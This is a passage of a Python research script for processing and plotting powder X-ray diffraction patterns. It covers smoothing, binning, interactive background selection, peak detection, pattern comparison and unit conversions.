Flannery\n Cambridge University Press ISBN-13: 9780521880688\n\n FROM: http://www.scipy.org/Cookbook/SavitzkyGolay\n \"\"\"\n try:\n window_size = abs(int(window_size)) # np.int was removed in NumPy 1.24; the builtin is equivalent here\n order = abs(int(order))\n except ValueError:\n raise ValueError(\"window_size and order have to be of type int\")\n if window_size % 2 != 1 or window_size < 1:\n raise TypeError(\"window_size must be a positive odd number\")\n if window_size < order + 2:\n raise TypeError(\"window_size is too small for the polynomial's order\")\n order_range = list(range(order+1))\n\n half_window = (window_size - 1) // 2\n # precompute coefficients\n b = np.array([[k**i for i in order_range]\n for k in range(-half_window, half_window+1)])\n m = np.linalg.pinv(b)[deriv] # coefficients (plain ndarray instead of the deprecated np.mat/.A)\n\n # pad the signal at the extremes with\n # values taken from the signal itself\n firstvals = y[0] - np.abs(y[1:half_window+1][::-1] - y[0])\n lastvals = y[-1] + np.abs(y[-half_window-1:-1][::-1] - y[-1])\n y = np.concatenate((firstvals, y, lastvals))\n return np.convolve(m, y, mode='valid')\n\n\ndef wavelength_info(wl):\n \"\"\"Little summary for given wavelength\"\"\"\n\n energy = wavelength2energy(wl)\n\n print(f\"wavelength: {wl:.5f} angstrom\")\n print(f\"energy: {energy:.5f} kev\")\n\n dvals = 10/np.linspace(1, 10, 10)\n\n theta2 = d2twotheta(dvals, wl)\n qvals = 4*(np.pi/wl) * np.sin(np.radians(theta2/2))\n\n print(\"\\n d th2 q\")\n for d, th2, q in zip(dvals, theta2, qvals):\n print(f\"{d:10.3f} {th2:10.3f} {q:10.3f}\")\n print()\n\n\ndef calc_agreement(o, c, bg=0, kind='linear'):\n \"\"\"Calculates agreement values for the given data.\"\"\"\n if np.any(bg):\n bg = interpolate(bg.T, c.x, kind=kind) # need linear or better here\n\n # nearest is fast and accurate, anything else is very slow\n oy = interpolate(o.xy, c.x, kind='nearest') - bg\n # oe = interpolate(o.xye[:,0:3:2],c.x,kind='nearest')\n\n rp = np.sum(np.abs(oy - c.y)) / np.sum(oy) # profile R-value\n\n # w = (1/oe)**2\n # rwp = ( np.sum(w*(oy - c.y)**2) / np.sum(w*(oy)**2) )**0.5 # weighted\n # profile R-value\n\n return rp\n\n\nclass Data:\n \"\"\"Container class for x, y, err data\"\"\"\n\n total = 0\n plot_range = None\n\n def __init__(self, arr, name=None, quiet=False, is_ticks=False):\n if not quiet:\n print(f'Loading data: {name}\\n shape: {arr.shape}')\n\n self.is_ticks = is_ticks\n\n if self.plot_range:\n r0, r1 = self.plot_range\n self.arr = arr[np.logical_and(arr[:, 0] >= r0, arr[:, 0] <= r1)]\n else:\n self.arr = arr\n\n try:\n self.x = self.arr[:, 0]\n self.y = self.arr[:, 1]\n self.xy = self.arr[:, 0:2]\n self.xye = self.arr[:, 0:3]\n except IndexError:\n raise OSError(f\"Could not load file/data: {name}\")\n\n try:\n self.err = self.arr[:, 2]\n except IndexError:\n self.err = None\n self.has_esd = False\n else:\n if np.all(np.isnan(self.err)): # '== np.nan' is always False; use np.isnan\n self.has_esd = False\n self.err = None\n else:\n self.has_esd = True\n\n self.index = self.total\n self.filename = name\n Data.total += 1\n\n if not quiet and not is_ticks:\n n = len(self.x) # observations\n if self.has_esd:\n w = 1/self.err**2 # weights\n else:\n w = 1/(np.abs(self.y)+0.1) # weights = y^-1 if no esds\n print(f' R_exp: {((n) / np.sum(w*self.y**2))**0.5:.3%}')\n\n def bin(self, binsize=0.01):\n x = self.x\n y = self.y\n fn = self.filename\n\n print(f'Binning {fn} from 2th = {min(x)} - {max(x)} with a bin size of {binsize}')\n print()\n print('N(x) = ', x.shape)\n print('N(y) = ', y.shape)\n\n bins = np.arange(min(x), max(x), binsize)\n\n print('N(bins) =', bins.shape)\n print()\n\n digi = np.digitize(x, 
bins)\n\n xbinned = np.array([x[digi == i].mean() for i in range(1, len(bins))])\n ybinned = np.array([y[digi == i].mean() for i in range(1, len(bins))])\n\n xbinned.shape = (-1, 1)\n ybinned.shape = (-1, 1)\n\n root, ext = os.path.splitext(self.filename)\n name = root+'_bin_'+str(binsize)+ext\n\n if self.has_esd:\n interpolated_errors = interpolate(\n (self.x, self.err), xbinned, kind='linear')\n return Data(np.hstack((xbinned, ybinned, interpolated_errors)), name=name)\n else:\n return Data(np.hstack((xbinned, ybinned)), name=name)\n\n def smooth(self, window='savitzky_golay', window_len=7, order=3, suffix='_smooth'):\n assert window in ['flat', 'hanning', 'hamming',\n 'bartlett', 'blackman', 'savitzky_golay', 'moving_avg']\n\n print(f' >> Applying filter: {window}, window: {window_len}, order {order} (SG only) to {self.filename}')\n\n if window == 'savitzky_golay':\n y = savitzky_golay(self.y, window_size=window_len, order=order)\n else:\n y = smooth(self.y, window_len=window_len, window=window)\n\n root, ext = os.path.splitext(self.filename)\n name = root+suffix+ext\n\n x = np.copy(self.x)\n\n y.shape = (-1, 1)\n x.shape = (-1, 1)\n\n return Data(np.hstack((x, y)), name=name)\n\n def convert_wavelength(self, wavelength_in, wavelength_out):\n \"\"\"Converts 2theta values to a different wavelength\"\"\"\n print()\n print(f\" ** Convert {self.filename} from {wavelength_in:.4f} ANG ({wavelength2energy(wavelength_in):.2f} keV) to {wavelength_out:.4f} ANG ({wavelength2energy(wavelength_out):.2f} keV)\")\n print()\n d = twotheta2d(self.x, wavelength_in)\n theta2 = d2twotheta(d, wavelength_out)\n arr = self.arr\n arr[:, 0] = theta2\n return Data(arr, name=self.filename)\n\n def print_pattern(self, name=None, tag=\"\"):\n \"\"\"print self (x,y,e) to 3 column file. If no name is given, original file is overwritten.\n A tag can be added to modify the original filename instead (ie. data.xye -> data_binned.xye)\"\"\"\n\n if tag:\n tag = \"_\" + tag\n\n if not name:\n root, ext = os.path.splitext(self.filename)\n name = root + tag + ext\n np.savetxt(name, self.xye, fmt='%15.5f')\n\n print(f'Pattern written to {name}')\n\n def plot(self, ax):\n ax.plot(self.x, self.y)\n\n\nclass Background:\n sensitivity = 8\n\n def __init__(self, fig, d=None, outfunc=None, bg_correct=False, quiet=False, out=None, npick=-1, topas_bg=False, xrs=None):\n \"\"\"Class that captures mouse events when a graph has been drawn, stores the coordinates\n of these points and draws them as a line on the screen. 
Can also remove points and print all\n the stored points to stdout\n\n http://matplotlib.sourceforge.net/users/event_handling.html\n http://matplotlib.sourceforge.net/api/pyplot_api.html#matplotlib.pyplot.plot\n\n Takes:\n a figure object\n optional numpy array with background coordinates, shape = (2,0)\n\n xy: 2d ndarray, shape(2,0) with x,y data\"\"\"\n\n self.npick = npick\n\n self.out = out\n\n self.ax = fig.axes[0]\n self.topas_bg = topas_bg\n self.xrs = xrs\n\n if d:\n self.d = d\n self.xy = np.array(self.d.xy, copy=True).T\n else:\n self.d = None\n self.xy = None\n\n try:\n idx = self.xy[0, :].argsort()\n self.xy = self.xy[:, idx]\n except (IndexError, ValueError, TypeError):\n self.xy = np.array([], dtype=float).reshape(2, 0)\n\n self.line, = self.ax.plot(*self.xy, lw=0.5, marker='s', mec='red', mew=2,\n mfc='None', markersize=5, picker=self.sensitivity, label='interactive background')\n\n self.pick = self.line.figure.canvas.mpl_connect(\n 'pick_event', self.onpick)\n self.cid = self.line.figure.canvas.mpl_connect(\n 'button_press_event', self)\n\n self.keyevent = self.line.figure.canvas.mpl_connect(\n 'key_press_event', self.onkeypress)\n\n self.n = 0\n\n self.tb = plt.get_current_fig_manager().toolbar\n\n if self.topas_bg:\n self.last_agreement = 0\n\n print()\n print('Left mouse button: add point')\n print('Right mouse button: remove point')\n print('Middle mouse button or press \"a\": print points to file/stdout')\n print()\n print('Note: Adding/Removing points disabled while using drag/zoom functions.')\n print()\n\n self.bg_correct = bg_correct\n if self.bg_correct:\n # Set limited range to speed up calculations\n self.bg_range = np.arange(self.xy[0][0], self.xy[0][-1], 0.01)\n self.bg, = self.ax.plot(self.d.x, self.d.y, label='background')\n\n def __call__(self, event):\n \"\"\"Handles events (mouse input)\"\"\"\n # Skips events outside of canvas\n if event.inaxes != self.line.axes:\n return\n # Skips events if any of the toolbar buttons are active\n if self.tb.mode != '':\n return\n\n xdata = event.xdata\n ydata = event.ydata\n x, y = event.x, event.y\n\n button = event.button\n # print event\n\n if button == 1: # lmb\n self.add_point(x, y, xdata, ydata)\n if button == 2: # mmb\n self.printdata()\n if button == 3: # rmb\n pass\n\n if self.bg_correct and button:\n self.background_update()\n\n self.line.set_data(self.xy)\n self.line.figure.canvas.draw()\n\n if len(self.xy.T) == self.npick:\n print('\\nClosing window...')\n import time\n time.sleep(1)\n plt.close()\n\n def onpick(self, event):\n \"\"\"General data point picker, should work for all kinds of plots?\"\"\"\n if not event.mouseevent.button == 3: # button 3 = right click\n return\n\n ind = event.ind\n\n removed = self.xy[:, ind]\n self.xy = np.delete(self.xy, ind, 1)\n\n if self.topas_bg:\n agreement = calc_agreement(\n self.xyobs, self.xycalc, self.xy, kind=self.bg_correct)\n difference = agreement - self.last_agreement\n self.last_agreement = agreement\n string = f'{agreement:.4f} ({difference:+.4f})'\n else:\n string = \"\"\n\n for n in range(len(ind)):\n print(f' --- {removed[:, n][0]:.4f} {removed[:, n][1]:.4f} {string}')\n\n def onkeypress(self, event):\n if event.key == 'x':\n print('x pressed')\n if event.key == 'y':\n print('y pressed')\n if event.key == 'z':\n print('z pressed')\n if event.key == 'a':\n print('\\na pressed')\n self.printdata()\n\n def add_point(self, x, y, xdata, ydata):\n \"\"\"Store both data points as relative x,y points. 
The latter are needed to remove points\"\"\"\n\n self.xy = np.append(self.xy, [[xdata], [ydata]], axis=1)\n idx = self.xy[0, :].argsort()\n self.xy = self.xy[:, idx]\n\n if self.topas_bg:\n agreement = calc_agreement(\n self.xyobs, self.xycalc, self.xy, kind=self.bg_correct)\n difference = agreement - self.last_agreement\n self.last_agreement = agreement\n string = f'{agreement:.4f} ({difference:+.4f})'\n else:\n string = \"\"\n\n print(f'+++ {xdata:.4f} {ydata:.4f} {string}')\n\n def background_update(self):\n xy = self.xy.T\n\n if xy.shape[0] < 2:\n self.bg.set_data([], [])\n return\n\n bg_vals = interpolate(xy, self.bg_range, kind=self.bg_correct)\n self.bg.set_data(self.bg_range, bg_vals)\n\n def get_esds(self):\n \"\"\"Returns None if no esds are present on the background, otherwise, it tries to interpolate the esds already present\n The esds should be specified (manually) in the background beforehand.\"\"\"\n\n if self.d is None:\n return None\n\n if self.d.has_esd:\n print('\\nAttempting to interpolate standard deviations... for new background\\n')\n esds = interpolate(self.d.xye[:, 0:3:2], self.xy[0], kind='linear')\n\n else:\n esds = None\n\n return esds\n\n def printdata(self, fout=None):\n \"\"\"Prints stored data points to stdout\"\"\"\n if not self.xy.any():\n print('No stored coordinates.')\n return None\n\n if not fout:\n fout = self.out\n\n esds = self.get_esds()\n\n if self.xrs:\n new_stepco_inp(self.xy, *self.xrs, esds=esds)\n else:\n fout = open(fout, 'w')\n for x, y in self.xy.transpose():\n print(f'{x:15.6f} {y:15.6f}', file=fout)\n\n\nclass Lines:\n\n \"\"\"docstring for Lines\"\"\"\n\n def __init__(self, fig, hide=False):\n super().__init__()\n if hide:\n self.plot = self.black_hole\n self.plot_tick_marks = self.black_hole\n else:\n self.fig = fig\n self.ax = self.fig.add_subplot(111)\n\n self.normalize = False\n self.nomove = False\n self.linewidth = 1.0\n # self.fig.canvas.mpl_connect('pick_event', self.onpick)\n\n def onpick(self):\n \"\"\"General data point picker, should work for all kinds of plots?\"\"\"\n pass\n\n def plot(self, data, lw=None):\n # n = data.index\n # colour = 'bgrcmyk'[n%7]\n\n if not lw:\n lw = self.linewidth\n\n ax = self.ax\n label = data.filename\n\n if self.normalize:\n scale = np.trapz(data.y, data.x)\n # scale = np.max(data.y)\n print(f' >> Scaling {data.filename} by 1/{scale:.5f}')\n data.y = data.y / scale\n # print scale\n # elif 'x_ycalc_no_sda.xy' in data.filename or 'ssz61_am_corr.xye' in data.filename:\n # scale = 500\n # print ' >> Arbitrarily scaling {} {:.5f} [ hardcoded, line {}: lines.plot() ]'.format(data.filename,scale,lineno())\n # data.y = data.y * scale\n\n # scl = 1\n # if 'esd' in data.filename:\n # scl = 20\n\n if self.nomove:\n ax.plot(data.x, data.y, label=label, lw=lw)\n else:\n dx, dy = 0/72., 64/72.\n\n dx *= data.index\n dy *= data.index\n offset = transforms.ScaledTranslation(\n dx, dy, self.fig.dpi_scale_trans)\n transform = ax.transData + offset\n\n # transform broken as of matplotlib 1.2.0, because it doesn't\n # rescale the view\n ax.plot(data.x, data.y, transform=transform, label=label, lw=lw)\n\n ax.axis(\n [data.x.min(), data.x.max()*1.2, data.y.min(), data.y.max()*1.2])\n\n def plot_tick_marks(self, data, i=0):\n ax = self.ax\n\n label = data.filename\n\n dx, dy = 0, -16*(i+1)/72.0\n\n offset = transforms.ScaledTranslation(dx, dy, self.fig.dpi_scale_trans)\n transform = ax.transData + offset\n\n ax.plot(data.x, data.y, transform=transform, c='black',\n label=label, linestyle='', marker='|', 
markersize=15)\n # plt.plot(tck, np.zeros(tck.size) - (mx_dif / 4), linestyle='', marker='|', markersize=10, label = 'ticks', c='purple')\n\n def plot_ticks_scaled(self, data):\n ax = self.ax\n # label = data.filename\n ax.vlines(data.x, -100, data.y)\n\n def plot_boxes(self, fname):\n \"\"\"http://stackoverflow.com/questions/6895935/data-plotting-in-boxes-with-python\n http://matplotlib.org/api/artist_api.html#matplotlib.patches.Rectangle\"\"\"\n from matplotlib import patches\n\n ax = self.ax\n lw = self.linewidth\n alpha = 0.6\n\n boxes = np.loadtxt(fname, unpack=True)\n print(f'Loading boxes: {fname}\\n shape: {boxes.shape}')\n\n y1 = 0\n\n for x1, x2, y2 in boxes.T:\n # Class matplotlib.patches.Rectangle(xy, width, height, **kwargs)\n rect = patches.Rectangle(\n (x1, y1), x2-x1, y2, edgecolor='red', facecolor='none', lw=lw, alpha=alpha)\n ax.add_patch(rect)\n\n def black_hole(*args, **kwargs):\n pass\n\n\ndef plot_correlation_matrix(arr, labels=[]):\n def formatter(arr, x, y, labels):\n if labels:\n print(f'{x:4}{y:4}{arr[x, y]:8} {labels[x]} {labels[y]}')\n else:\n print(f'{x:4}{y:4}{arr[x, y]:8}')\n\n def onpick(event):\n x, y = int(event.mouseevent.xdata), int(event.mouseevent.ydata)\n formatter(arr, x, y, labels)\n\n threshold = np.max(abs(arr)) * 0.8\n first = True\n\n for x, y in np.argwhere(abs(arr) > threshold):\n if y > x or x == y:\n continue\n if first:\n print(f'\\n Highly correlated parameters (>{threshold}):')\n first = False\n formatter(arr, x, y, labels)\n\n pcolor = plt.pcolor(arr, picker=10)\n\n pick = pcolor.figure.canvas.mpl_connect('pick_event', onpick)\n\n plt.xlim(0, arr.shape[0])\n plt.ylim(0, arr.shape[1])\n plt.colorbar()\n plt.show()\n\n\ndef setup_interpolate_background(d, name='bg (--correct)'):\n print('Interpolation mode for background correction\\n')\n print('The highest and lowest values are added by default for convenience. In the case that they are removed, only the values in the background range will be printed.\\n')\n\n x1 = d.x[0]\n x2 = d.x[-1]\n y1 = d.y[0]\n y2 = d.y[-1]\n\n # print x1,x2,y1,y2\n xy = np.array([[x1, y1], [x2, y2]], dtype=float)\n\n return Data(xy, name=name)\n\n\ndef f_peakdetect(d, lookahead=10, noise=5000):\n from . 
import peakdetect as pd\n # from functools import partial\n\n _max, _min = pd.peakdetect(d.y, d.x, lookahead=lookahead, delta=noise)\n xm = [p[0] for p in _max]\n ym = [p[1] for p in _max]\n # xn = [p[0] for p in _min]\n # yn = [p[1] for p in _min]\n\n fig = plt.figure()\n ax = fig.add_subplot(111)\n d.plot(ax)\n\n peaks, = ax.plot(xm, ym, marker='o', lw=0,\n markeredgecolor='red', markerfacecolor='None', markersize=20)\n\n class Okp:\n\n \"\"\"Interactive keyboard controls for the peak detection parameters\"\"\"\n\n def __init__(self, noise, lookahead):\n self.noise = noise\n self.lookahead = lookahead\n self.noisestep = 0\n self.lookaheadstep = 0\n\n print('q,w,e = lookahead +/-/step') # keys match the onkeypress handler below\n print('1,2,3 = noise +/-/step')\n\n printer('lookahead = {}({}), noiselevel = {}({})'.format(self.lookahead, [\n 1, 10, 100][self.lookaheadstep % 3], self.noise, [1, 10, 100][self.noisestep % 3]))\n\n def onkeypress(self, event):\n if event.key == 'q':\n self.lookahead += [1, 10, 100][self.lookaheadstep % 3]\n if event.key == 'w':\n self.lookahead -= [1, 10, 100][self.lookaheadstep % 3]\n if self.lookahead < 1:\n self.lookahead = 1\n if event.key == 'e':\n self.lookaheadstep += 1\n if event.key == '1':\n self.noise += [1, 10, 100][self.noisestep % 3]\n if event.key == '2':\n self.noise -= [1, 10, 100][self.noisestep % 3]\n if self.noise < 0:\n self.noise = 0\n if event.key == '3':\n self.noisestep += 1\n\n printer('lookahead = {}({}), noiselevel = {}({})'.format(self.lookahead, [\n 1, 10, 100][self.lookaheadstep % 3], self.noise, [1, 10, 100][self.noisestep % 3]))\n\n _max, _min = pd.peakdetect(\n d.y, d.x, lookahead=self.lookahead, delta=self.noise)\n xm = [p[0] for p in _max]\n ym = [p[1] for p in _max]\n\n peaks.set_data(xm, ym)\n plt.draw()\n\n okp = Okp(noise, lookahead)\n\n # lines.ax.plot(xn,yn, marker='o', lw=0, markeredgecolor='blue', markerfacecolor='None', markersize=4)\n fig.canvas.mpl_connect('key_press_event', okp.onkeypress)\n plt.show()\n\n xm, ym = peaks.get_data()\n print()\n\n print(' 2theta intensity')\n for x, y in zip(xm, ym):\n print('{:15.4f}{:15.4f}'.format(x, y))\n # print xm,ym\n\n return xm, ym\n\n\ndef f_identify(d, refs, criterium=0.05, lookahead=10, noise=5000):\n import operator\n\n print(d.filename)\n\n print(lookahead, noise)\n\n if lookahead and noise:\n from . 
import peakdetect as pd\n _max, _min = pd.peakdetect(d.y, d.x, lookahead=lookahead, delta=noise)\n xm = [p[0] for p in _max]\n ym = [p[1] for p in _max]\n else:\n xm, ym = f_peakdetect(d)\n\n xm = np.array(xm)\n ym = np.array(ym)\n\n lst = []\n\n for fn in refs:\n # ref = read_data(fn,usecols=4,append_zeros=True,savenpy=False)\n ref = load_tick_marks(fn, col=4)\n\n diff_array = np.abs(xm-ref.x[:, np.newaxis])\n\n # print diff_array\n # print diff_array.shape\n\n min_diff = np.amin(diff_array, 0)\n\n # print min_diff\n\n da = min_diff < criterium\n\n # do manually\n exit()\n\n r = sum(min_diff[da]*min_diff[da]) / sum(xm[da]*xm[da])\n wr = sum(ym[da] * min_diff[da]*min_diff[da]) / \\\n sum(ym[da]*xm[da]*xm[da])\n missing = len(xm) - sum(da)\n\n lst.append((r, wr, missing, ref.filename))\n\n lst = sorted(lst, key=operator.itemgetter(2), reverse=True)\n\n print(lst)\n for (r, wr, missing, fn) in lst: # unpack as 'wr' so the weighted R-value printed below is the right one\n print(f'{r:6.3f} {wr:6.3f} using: {missing} refs --> {fn}')\n\n\ndef f_compare(data, kind=0, reference=None):\n import itertools\n import scipy.stats\n import operator\n\n def calc_combined_value(spearmanr, kendallr, pearsonr):\n spearmanr = spearmanr if not np.isnan(spearmanr) else 1.0\n kendallr = kendallr if not np.isnan(kendallr) else 1.0\n pearsonr = pearsonr if not np.isnan(pearsonr) else 1.0\n\n return pearsonr**(1/3.0)*kendallr**(1/3.0)*spearmanr**(1/3.0)\n\n # parameters used for calculated pattern\n start, stop, step = 2, 25.00, 0.01\n\n min_tt = 0 # boundary for check\n max_tt = 2300 # should not exceed number of parameters\n\n # shuffle = (-100,-80,-60,-40,-20,0,20,40,60,80,100)\n shuffle = (0,)\n max_shift = max(shuffle)\n min_shift = min(shuffle)\n\n xvals = np.arange(start, stop, step)\n # resample at same step rate as calculated pattern\n data = [Data(np.vstack((xvals, interpolate(\n d.xy, xvals, kind='linear'))).T, name=d.filename, quiet=True) for d in data]\n\n # for d in data:\n # print d.xy.shape\n\n if reference:\n reference = Data(np.vstack(\n (xvals, interpolate(reference.xy, xvals, kind='linear'))).T, name=reference.filename)\n pairs = ((reference, d) for d in data)\n l = float(len(data))\n lfill = len(reference.filename.split('/')[-1])\n rfill = max(len(d.filename.split('/')[-1]) for d in data)\n else:\n lfill = rfill = max(len(d.filename.split('/')[-1]) for d in data)\n pairs = itertools.combinations(data, 2)\n l = float(len(data)*(len(data)-1)/2)\n # pairs = itertools.combinations_with_replacement(data,2)\n\n lst = []\n\n print(f\"Calculate agreement for {int(l)} combinations of {len(data)} patterns.\")\n\n for i, (d1, d2) in enumerate(pairs):\n printer(f\"{i/l:2.0%}\")\n\n names = \"{:<{lfill}} - {:<{rfill}}\".format(\n d1.filename.split('/')[-1], d2.filename.split('/')[-1], lfill=lfill, rfill=rfill)\n\n for shift in shuffle:\n pearsonr, pearsonp = scipy.stats.pearsonr(\n d1.y[min_tt-min_shift+shift:max_tt-max_shift+shift], d2.y[min_tt-min_shift+shift:max_tt-max_shift+shift])\n kendallr, kendallp = scipy.stats.kendalltau(\n d1.y[min_tt-min_shift+shift:max_tt-max_shift+shift:5], d2.y[min_tt-min_shift+shift:max_tt-max_shift+shift:5])\n spearmanr, spearmanp = scipy.stats.spearmanr(\n d1.y[min_tt-min_shift+shift:max_tt-max_shift+shift], d2.y[min_tt-min_shift+shift:max_tt-max_shift+shift])\n\n if pearsonr <= 0 or kendallr <= 0 or spearmanr <= 0:\n continue\n\n # if pearsonp > 0.01 or kendallp > 0.01 or spearmanp > 0.01:\n # continue\n\n combined = calc_combined_value(pearsonr, kendallr, spearmanr)\n\n lst.append((combined, spearmanr, kendallr, pearsonr,\n 
spearmanp, kendallp, pearsonp, shift*step, names))\n\n printer(\"\")\n print()\n\n lst = sorted(lst, key=operator.itemgetter(kind))\n\n print(f'2theta range = {start+min_tt*step:8.3f} {start+max_tt*step:8.3f}')\n print(f'Shuffle values by {[shift*step for shift in shuffle]}')\n\n print('combined spearman pval kendall pval pearson pval shift -> sorted by {}'.format(['combined', 'spearman', 'kendall', 'pearson'][kind]))\n for (combined, spearmanr, kendallr, pearsonr, spearmanp, kendallp, pearsonp, shift, names) in lst:\n print(f\"{combined:8.3f} {spearmanr:8.3f} {spearmanp:8.3f} {kendallr:8.3f} {kendallp:8.3f} {pearsonr:8.3f} {pearsonp:8.3f} {shift:8.3f} \" + names)\n\n\ndef calc_fwhm(uvw):\n u, v, w = uvw\n th2 = np.linspace(0, 70, 70*50)\n th_rad = np.radians(th2 / 2)\n\n fwhm = (u*np.tan(th_rad)**2 + v*np.tan(th_rad) + w)**0.5\n\n xy = np.vstack([th2, fwhm]).T\n\n return Data(xy, 'UVW')\n\n\ndef fix_sls_data(data, quiet=False):\n \"\"\"Input list of Data objects, all of them will be processed and written to:\n filename_fixed.xye\"\"\"\n\n print()\n print('------------')\n print('FIX SLS DATA')\n print('------------')\n print()\n print('esds are calculated as:')\n print('esd = sqrt(Yobs/scale) * sqrt(1/N) * scale')\n print()\n print('Yobs: input pattern')\n print('scale: scale factor between raw counts (.raw) and corrected data (.dat)')\n print('N: number of raw patterns merged')\n print()\n print('Estimated scale by rearranging above formula:')\n print('(assuming background is correct)')\n print()\n print('scale = (N/Yobs) * esd^2')\n\n if not isinstance(data, list):\n data = list((data,))\n\n scl = input('\\nScale (leave blank for picking procedure) \\n >> ')\n npats = input('\\nNumber of raw patterns \\n >> [16]') or 16\n # scl = 1.3\n npats = float(npats)**0.5\n\n for i in range(len(data)):\n d = data[i]\n i += 1\n if 'esd' in d.filename:\n continue\n\n assert d.has_esd, '\\n *** Data file {} contains no standard deviations!!'.format(\n d.filename)\n\n if not scl:\n print('\\nPick 3 background points')\n print('These will be used to estimate the scale factor')\n print()\n\n fig = plt.figure()\n bg = Background(fig, d=None, quiet=quiet, npick=3)\n lines = Lines(fig, hide=quiet)\n lines.plot(d)\n plt.legend()\n plt.show()\n\n points = bg.xy.T\n\n avg = []\n for x, v in points:\n idx = find_nearest(d.x, x)\n scl1 = d.err[idx]**2 * (npats**2 / d.y[idx])\n avg.append(scl1)\n print(f'{d.err[idx]:10.4f}**2 * ({int(npats**2):d} / {d.y[idx]:10.4f}) = {scl1:10.4f}')\n scl = np.mean(avg)\n else:\n scl = float(scl)\n\n print()\n print('Npats =', int(npats**2))\n print('Scale =', scl)\n print()\n\n err = scl*(1/npats)*(d.y/scl)**0.5\n d2 = np.copy(d.xye)\n d2 = Data(np.vstack((d.x, d.y, err)).T, name=d.filename)\n d2.print_pattern(tag='fixed')\n data.append(d2)\n\n\ndef find_nearest(array, value):\n \"\"\"Find index of nearest value\"\"\"\n idx = (np.abs(array-value)).argmin()\n return idx\n\n\ndef twotheta2d(twotheta, wavelength):\n theta = np.radians(twotheta / 2)\n d = wavelength / (2*np.sin(theta))\n return d\n\n\ndef d2twotheta(d, wavelength):\n theta = np.degrees(np.arcsin((wavelength) / (2*d)))\n return 2*theta\n\n\ndef wavelength2energy(wl):\n \"\"\"Takes wavelength in Angstrom, returns energy in keV\"\"\"\n # 1E3 from ev to kev, divide by 1E10 from angstrom to meter\n return 1E10*planck_constant*speed_of_light/(wl*1E3*elementary_charge)\n\n\ndef energy2wavelength(E):\n \"\"\"Takes wavelength in keV, returns energy in Angstrom\"\"\"\n # 1E3 from ev to kev, divide by 1E10 from angstrom to 
meter\n return 1E10*planck_constant*speed_of_light/(E*1E3*elementary_charge)\n\n\ndef plot_reciprocal_space(fnobs, fncalc=None, orthogonal_view=True):\n from mpl_toolkits.mplot3d import Axes3D\n\n if orthogonal_view == True:\n from mpl_toolkits.mplot3d import proj3d\n\n def orthogonal_proj(zfront, zback):\n a = (zfront+zback)/(zfront-zback)\n b = -2*(zfront*zback)/(zfront-zback)\n return np.array([[1, 0, 0, 0],\n [0, 1, 0, 0],\n [0, 0, a, b],\n [0, 0, 0, zback]])\n print(\" >> Orthogonal view at least breaks automatic placement of axis labels.\")\n\n proj3d.persp_transformation = orthogonal_proj\n\n def onkeypress(event):\n if event.key == 'x':\n ax.view_init(0, 0)\n plt.draw()\n if event.key == 'y':\n ax.view_init(0, -90)\n plt.draw()\n if event.key == 'z':\n ax.view_init(90, -90)\n plt.draw()\n\n if fncalc:\n if not isinstance(fncalc, str):\n raise TypeError\n calc = np.loadtxt(fncalc)\n calc = {tuple(map(int, row[0:3])) for row in calc}\n\n if isinstance(fnobs, str):\n fnobs = [fnobs]\n\n try:\n obs = [np.loadtxt(fn) for fn in fnobs]\n except ValueError:\n obs = [np.genfromtxt(fn, delimiter=[4, 4, 4, 8, 8]) for fn in fnobs]\n obs = [{tuple(map(int, row[0:3])) for row in data} for data in obs]\n\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n ax.set_xlabel('h')\n ax.set_ylabel('k')\n ax.set_zlabel('l')\n fig.canvas.mpl_connect('key_press_event', onkeypress)\n print(' >> Press x,y,z to align view along specified axis.')\n\n for i, data in enumerate(obs):\n if fncalc:\n diff = calc - data\n absent = data - calc\n data = data & calc\n\n label = fnobs[i]\n\n h, k, l = list(zip(*data))\n ax.plot(h, k, l, 'b.', label=label+' observed', ms=2.50)\n\n # # Feeble attempt at getting heatmaps to work\n # hhm,hxe,hye = np.histogram2d(k,l,bins=50)\n # khm,kxe,kye = np.histogram2d(l,h,bins=50)\n # lhm,lxe,lye = np.histogram2d(h,k,bins=50)\n\n # hm = np.meshgrid(hxe,hye)\n # km = np.meshgrid(kxe,kye)\n # lm = np.meshgrid(lxe,lye)\n\n # ax.contour(hm[0],hm[1],hhm, zdir='x',offset=min(h))\n # ax.contour(km[0],km[1],khm, zdir='y',offset=min(k))\n # ax.contour(lm[0],lm[1],lhm, zdir='z',offset=min(l))\n\n if fncalc:\n h, k, l = list(zip(*diff))\n ax.plot(\n h, k, l, 'ro', label=label+' missing', mfc='None', mec='red')\n if len(absent) > 0:\n h, k, l = list(zip(*absent))\n ax.plot(h, k, l, 'r+', label=label+' sys. 
absent')\n # ax.plot(h,k,l,'b.',label = label+' observed', ms=2.50)\n else:\n print(' >> 0 systematic absences')\n plt.legend()\n plt.show()\n\n\ndef run_script(gui_options=None):\n description = \"\"\"Notes:\n- Requires numpy and matplotlib for plotting.\n- Scipy is needed for some interpolation functions.\n\"\"\"\n\n epilog = f'Updated: {__version__}'\n\n parser = argparse.ArgumentParser(description=description,\n epilog=epilog,\n formatter_class=argparse.RawDescriptionHelpFormatter,\n )\n\n def parse_wl(string):\n wavelengths = {\"cra1\": 2.28970, \"cra2\": 2.29361, \"cr\": 2.2909,\n \"fea1\": 1.93604, \"fea2\": 1.93998, \"fe\": 1.9373,\n \"cua1\": 1.54056, \"cua2\": 1.54439, \"cu\": 1.5418,\n \"moa1\": 0.70930, \"moa2\": 0.71359, \"mo\": 0.7107,\n \"aga1\": 0.55941, \"aga2\": 0.56380, \"ag\": 0.5608, \"sls\": 1.0000}\n if string.lower().endswith('kev'):\n return energy2wavelength(float(string.lower().replace('kev', \"\")))\n elif string.lower() in wavelengths:\n return wavelengths[string.lower()]\n else:\n return float(string)\n\n parser.add_argument(\"args\",\n type=str, metavar=\"FILE\", nargs='*',\n help=\"Paths to input files.\")\n\n parser.add_argument(\"-s\", \"--shift\",\n action=\"store_false\", dest=\"nomove\",\n help=\"Slightly shift different plots to make them more visible (useful to make a waterfall plot).\")\n\n parser.add_argument(\"-i\", \"--bgin\",\n action=\"store\", type=str, dest=\"bg_input\",\n help=\"Initial points for bg correction (2 column list; also works with stepco.inp). Overwrites the file with updated coordinates.\")\n\n parser.add_argument(\"-t\", \"--ticks\",\n action='store', type=str, nargs='*', dest=\"plot_ticks\",\n help=\"Specify tick mark file. Assuming list of 2 theta values. Special value => hkl.dat. Specify column with --tc\")\n\n parser.add_argument(\"-r\", \"--range\",\n action='store', type=float, nargs=2, dest=\"plot_range\",\n help=\"Specify plot range for data files.\")\n\n parser.add_argument(\"-c\", \"--bgcorrect\", metavar='OPTION',\n action=\"store\", type=str, 